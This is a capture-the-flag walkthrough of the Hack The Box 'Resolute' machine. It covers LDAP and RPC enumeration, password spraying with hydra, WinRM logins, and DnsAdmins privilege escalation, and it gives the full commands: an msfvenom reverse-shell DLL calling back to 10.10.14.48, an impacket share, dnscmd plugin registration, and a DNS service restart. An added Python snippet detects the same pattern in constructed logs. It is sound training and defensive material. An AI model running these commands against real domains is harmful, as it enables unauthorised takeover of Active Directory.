This is the write-up/walkthrough of the RESOLUTE machine from Hack The Box.
NMAP SCAN:
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2023-08-09 13:09:28Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open syn-ack Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
Domain found: megabank.local, NetBIOS name: Resolute
No file shares were found over SMB, so I used ldapsearch to enumerate the domain, redirected the output to a file, and extracted all account names from it.
ldapsearch -H ldap://10.10.10.169 -D '' -w '' -b "DC=megabank,DC=local" > ldap_search
cat ldap_search | grep sAMAccountName | awk '{print $2}' > users.txt
# the first entries are group names, not users; remove them from users.txt first
After that I used rpcclient to enumerate the domain further. The output of the "querydispinfo" command showed a password set on the marko account, "Welcome123!", so I used this password to spray against the user list I had collected.
rpcclient -U "" -N 10.10.10.169
rpcclient $> querydispinfo

After that I used hydra to try that one password against every user in the list, and it came back as a valid SMB password for the user melanie.
hydra -L users.txt -p 'Welcome123!' smb://10.10.10.169

The same username and password also work for WinRM; I confirmed this with crackmapexec.
crackmapexec winrm 10.10.10.169 -u users.txt -p 'Welcome123!'

I logged in with evil-winrm and got the user flag.
While enumerating, I found a hidden directory in C:\ named PSTranscripts. Deeper inside it was a file containing a PowerShell transcript, and reading that file revealed the password of the ryan user.

After connecting as ryan with evil-winrm, I found that ryan is a member of the Contractors group, and that this group is itself a member of DnsAdmins. Searching for DnsAdmins abuse on the Internet, I found a technique: register a malicious DLL as the DNS server plugin using dnscmd, then stop and start the DNS service so the DLL is loaded and gives a reverse shell.
Ryan is a member of the Contractors group.

Checking the local group memberships, I found a DnsAdmins group; its members include the Contractors group, which means ryan is effectively in DnsAdmins.

I followed this blog to get the Administrator account/DA; read the blog for more details.
I will show two methods for getting an Administrator account: the first gets a shell directly, and the second modifies a user account (or changes the administrator password) directly.
Note: In a real-world environment, changing the credentials of any user is not recommended.
Method 1:
Generate a malicious DLL with msfvenom to get a reverse shell:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.48 LPORT=1337 -f dll -o h311.dll
Then start an SMB server with impacket in the directory where the generated DLL is located:
impacket-smbserver -smb2support share .
On the ryan session, use dnscmd to register the generated DLL as the server-level plugin:
dnscmd /config /serverlevelplugindll \\YOUR-TUNNEL-IP\share\h311.dll
Start the Metasploit listener:
msfconsole -q
msf6> use multi/handler
msf6> set payload windows/x64/meterpreter/reverse_tcp
msf6> set lhost tun0
msf6> set lport 1337
msf6> run
# now wait for the connection
Then stop the DNS service and start it again; make sure the Metasploit listener is already running.
sc.exe stop dns
sc.exe start dns

Method 2:
Generate the payload with msfvenom again, but this time embed the command to run directly in it:
msfvenom -p windows/x64/exec cmd='net localgroup Administrators ryan /add /domain' -f dll -o h311_add.dll
Then start an SMB server with impacket in the directory where the generated DLL is located:
impacket-smbserver -smb2support share .
On the ryan session, use dnscmd to register the generated DLL as the server-level plugin:
dnscmd /config /serverlevelplugindll \\YOUR-TUNNEL-IP\share\h311_add.dll
Then stop the DNS service and start it again so the new DLL is loaded.
sc.exe stop dns
sc.exe start dns
Now I can check that ryan is in the Administrators group.
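From the defender's side, the sequence used in both methods (a write to the DNS service's ServerLevelPluginDll registry value, especially one pointing at a UNC path, followed by a stop/start of the DNS service) is a clear detection pattern. The following Python is an added example, not part of the original write-up or the blog it follows: it runs that correlation over constructed, simplified event records; the "timestamp|event_id|details" format and all sample values are assumptions, not real Windows log output.

```python
import re
from datetime import datetime, timedelta

# Constructed, simplified event records ("timestamp|event_id|details"); not real
# Windows logs. 4657 = registry value modified, 7036 = service state change.
SAMPLE_EVENTS = [
    "2023-08-09 13:20:01|4657|Object: HKLM\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters "
    "ValueName: ServerLevelPluginDll NewValue: \\\\10.10.14.48\\share\\h311.dll Subject: MEGABANK\\ryan",
    "2023-08-09 13:20:15|7036|The DNS Server service entered the stopped state.",
    "2023-08-09 13:20:17|7036|The DNS Server service entered the running state.",
    "2023-08-09 15:00:00|4657|Object: HKLM\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters "
    "ValueName: ServerLevelPluginDll NewValue: C:\\Windows\\System32\\dns\\plugin.dll Subject: MEGABANK\\svc_dns",
    "2023-08-09 16:30:00|4657|Object: HKLM\\SOFTWARE\\Example ValueName: Other NewValue: 1 Subject: MEGABANK\\bob",
]

PLUGIN_RE = re.compile(r"ValueName: ServerLevelPluginDll NewValue: (\S+)")
SUBJECT_RE = re.compile(r"Subject: (\S+)")

def parse_event(line):
    """Split one constructed record into (timestamp, event id, details)."""
    ts, event_id, details = line.split("|", 2)
    return datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), int(event_id), details

def detect_plugin_dll_abuse(lines, window=timedelta(minutes=5)):
    """Return one alert per ServerLevelPluginDll write, flagging UNC (remote) DLL
    paths and a DNS Server service state change that follows within `window`."""
    events = [parse_event(line) for line in lines]
    alerts = []
    for ts, event_id, details in events:
        if event_id != 4657:
            continue
        match = PLUGIN_RE.search(details)
        if not match:
            continue  # registry change unrelated to the DNS plugin DLL
        dll = match.group(1)
        subject = SUBJECT_RE.search(details)
        restarted = any(
            other_id == 7036 and "DNS Server" in other_details and ts <= other_ts <= ts + window
            for other_ts, other_id, other_details in events
        )
        remote = dll.startswith("\\\\")  # DLL served from a UNC share, as in this box
        alerts.append({
            "time": ts, "user": subject.group(1) if subject else None, "dll": dll,
            "remote_dll": remote, "restarted": restarted,
            # remote DLL plus an immediate restart is the full DnsAdmins-to-SYSTEM sequence
            "severity": "high" if remote and restarted else "medium",
        })
    return alerts

if __name__ == "__main__":
    for alert in detect_plugin_dll_abuse(SAMPLE_EVENTS):
        print(alert)
```

Any write to ServerLevelPluginDll is worth reviewing; the high-severity case is the one where the path is a UNC share and the service is restarted right after.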

But in this lab there is a note.txt on ryan's Desktop saying that any changes to the administrator account are reverted within 1 minute. There are also many other ways to get an administrator account from this position; try some of them on your own.
